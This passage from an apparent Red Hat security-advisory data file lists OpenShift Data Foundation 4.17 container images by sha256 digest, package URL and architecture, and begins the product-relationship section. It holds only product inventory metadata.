"pkg:oci/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", product: { name: "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", product_id: "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.17.0-23", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", product: { name: "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", product_id: "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", product: { name: "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", product_id: "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", product: { name: "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", product_id: "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.17.0-31", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.17.0-66", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", product: { name: "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", product_id: "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", product: { name: "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", product_id: "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.17.0-60", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", product: { name: "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", product_id: "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4?arch=amd64&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.17.0-29", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", product: { name: "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", product_id: "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081?arch=amd64&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1?arch=amd64&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.17.0-7", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", product_id: "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", product_id: "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.17.0-17", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", product: { name: "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", product_id: "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70?arch=amd64&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.17.0-14", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", product: { name: "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", product_id: "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2?arch=amd64&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", product: { name: "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", product_id: "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f?arch=amd64&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.17.0-20", }, }, }, { category: "product_version", name: "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", product: { name: "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", product_id: "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", product_identification_helper: { purl: "pkg:oci/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1?arch=amd64&repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", product: { name: "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", product_id: "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f?arch=amd64&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", product: { name: "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", product_id: "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3?arch=amd64&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", product: { name: "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", product_id: "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87?arch=amd64&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.17.0-40", }, }, }, { category: "product_version", name: "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", product: { name: "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", product_id: "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", product_identification_helper: { purl: "pkg:oci/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda?arch=amd64&repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", product: { name: "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", product_id: "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", product_identification_helper: { purl: "pkg:oci/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438?arch=amd64&repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", product_id: "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2?arch=amd64&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.17.0-51", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", product: { name: "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", product_id: "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2?arch=arm64&repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator&tag=v4.17.0-15", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", product: { name: "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", product_id: "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb?arch=arm64&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.17.0-69", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", product: { name: "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", product_id: "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505?arch=arm64&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.17.0-23", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", product: { name: "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", product_id: "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d?arch=arm64&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.17.0-31", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", product: { name: "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", product_id: "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be?arch=arm64&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.17.0-60", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", product: { name: "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", product_id: "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0?arch=arm64&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.17.0-29", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319?arch=arm64&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2?arch=arm64&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c?arch=arm64&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.17.0-17", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", product: { name: "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", product_id: "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db?arch=arm64&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.17.0-14", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", product: { name: "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", product_id: "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97?arch=arm64&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.17.0-20", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", product: { name: "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", product_id: "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae?arch=arm64&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.17.0-40", }, }, }, ], category: "architecture", name: "arm64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", }, product_reference: "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", }, product_reference: "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", }, product_reference: "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: 